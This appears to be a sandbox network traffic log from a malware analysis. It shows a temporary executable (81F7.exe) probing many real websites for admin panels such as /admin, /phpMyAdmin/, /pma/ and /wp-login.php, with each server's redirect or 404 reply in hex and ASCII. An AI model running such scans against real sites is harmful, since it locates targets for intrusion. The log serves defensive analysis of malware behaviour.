Feb 21, 2024 00:26:16.748754025 CET	215	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
421	192.168.2.6	49633	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.460107088 CET	169	OUT	GET /admin.php HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.774861097 CET	922	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 480 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:17 GMT server: nginx set-cookie: sid=71c93faf-d047-11ee-b8a0-b2ef4d88d55b; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:24 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 61 64 6d 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 33 4e 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 32 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 30 32 61 7a 63 31 64 6d 52 77 63 33 45 31 59 54 41 78 63 33 41 79 4e 47 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 7a 59 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 63 32 4e 54 4d 30 4f 54 67 33 66 51 2e 47 44 37 70 44 44 49 79 42 4c 57 53 5f 2d 54 33 74 31 74 62 68 41 4f 73 6b 5f 42 67 49 45 47 69 51 70 66 73 4a 59 30 6b 79 53 38 26 73 69 64 3d 37 31 63 39 33 66 61 66 2d 64 30 34 37 2d 31 31 65 65 2d 62 38 61 30 2d 62 32 65 66 34 64 38 38 64 35 35 62 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/admin.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc3NiwiaWF0IjoxNzA4NDcxNTc2LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYm02azc1dmRwc3E1YTAxc3AyNGYiLCJuYmYiOjE3MDg0NzE1NzYsInRzIjoxNzA4NDcxNTc2NTM0OTg3fQ.GD7pDDIyBLWS_-T3t1tbhAOsk_BgIEGiQpfsJY0kyS8&sid=71c93faf-d047-11ee-b8a0-b2ef4d88d55b');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
422	192.168.2.6	49332	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.671535969 CET	170	OUT	GET /admin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:16.953942060 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
423	192.168.2.6	49490	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.827521086 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.104114056 CET	415	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Location: https://amsantechnology.com/phpMyAdmin/ Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
424	192.168.2.6	49549	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.861072063 CET	187	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.131896019 CET	457	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/phpMyAdmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
425	192.168.2.6	50246	193.70.18.144	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.901438951 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.060798883 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
426	192.168.2.6	50378	75.2.70.75	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.909601927 CET	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.003540039 CET	349	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/PhpMyAdmin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:17.208249092 CET	349	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/PhpMyAdmin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
427	192.168.2.6	50310	91.195.240.135	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.981955051 CET	169	OUT	GET /pma/ HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.158813000 CET	336	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:17 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/pma/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
428	192.168.2.6	50492	3.33.139.32	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.982788086 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.129769087 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
429	192.168.2.6	50364	144.91.85.110	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:16.995966911 CET	164	OUT	GET /pma/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.174032927 CET	526	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/pma/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
430	192.168.2.6	50523	3.33.130.190	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.051898003 CET	166	OUT	GET /admin HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.147906065 CET	216	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/admin ETag: "65d0dd59-0"
Feb 21, 2024 00:26:17.352405071 CET	216	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
431	192.168.2.6	50386	23.236.62.147	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.062278986 CET	166	OUT	GET /pma/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.272835970 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/pma strict-transport-security: max-age=3600 x-wix-request-id: 1708471577.148735630511110782 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpWLR7NwFBb3G7OT5BzL/54m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRall9BxEx9SYXlnpBBvbyo+4Za/zM/1Lh+TymBW9Lw2pHrIBCXoBFVgBa/IF9xubLeVw==,2UNV7 Data Raw: Data Ascii:
Feb 21, 2024 00:26:17.272847891 CET	254	IN	Data Raw: 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4c 66 42 30 48 37 62 64 52 50 67 54 52 74 63 37 74 71 6e 4f 7a 70 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f 52 4f 4f 2b 43 4c Data Ascii: Oq4oGjA5+PKsX47LfB0H7bdRPgTRtc7tqnOzpjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVUwOZ8GUfIcrDrG391HVtVSz4D2PFRhC5HA4zrltzn4LTq/hWR+DDCXRX2HnNlbYrSw==Cache-Control: no-cacheX-Content-Type-Options:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
432	192.168.2.6	50493	188.40.92.90	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.070928097 CET	161	OUT	GET /pma/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.245459080 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
433	192.168.2.6	50601	198.185.159.145	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.091939926 CET	168	OUT	GET /admin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.202045918 CET	273	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:17 GMT Location: https://www.mwpmedia.com/admin/ Server: Squarespace Set-Cookie: crumb=BSrQCMz1AoRKNWYwNThlNTg3NmRkMTYyMTFiMDQ0YTM1NDQ0OTJh;Path=/ X-Contextid: 9h0ObIMl/THs5DBcK Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
434	192.168.2.6	50726	13.248.243.5	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.150852919 CET	177	OUT	GET /admin HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.256313086 CET	313	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/admin vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:17 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
435	192.168.2.6	50626	51.159.190.167	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.170939922 CET	179	OUT	GET /wp-login.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.330243111 CET	368	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
436	192.168.2.6	50701	86.105.245.69	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.211466074 CET	175	OUT	GET /admin.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.376918077 CET	390	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
437	192.168.2.6	50702	217.160.122.119	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.223213911 CET	174	OUT	GET /pma/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.665693998 CET	1286	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e 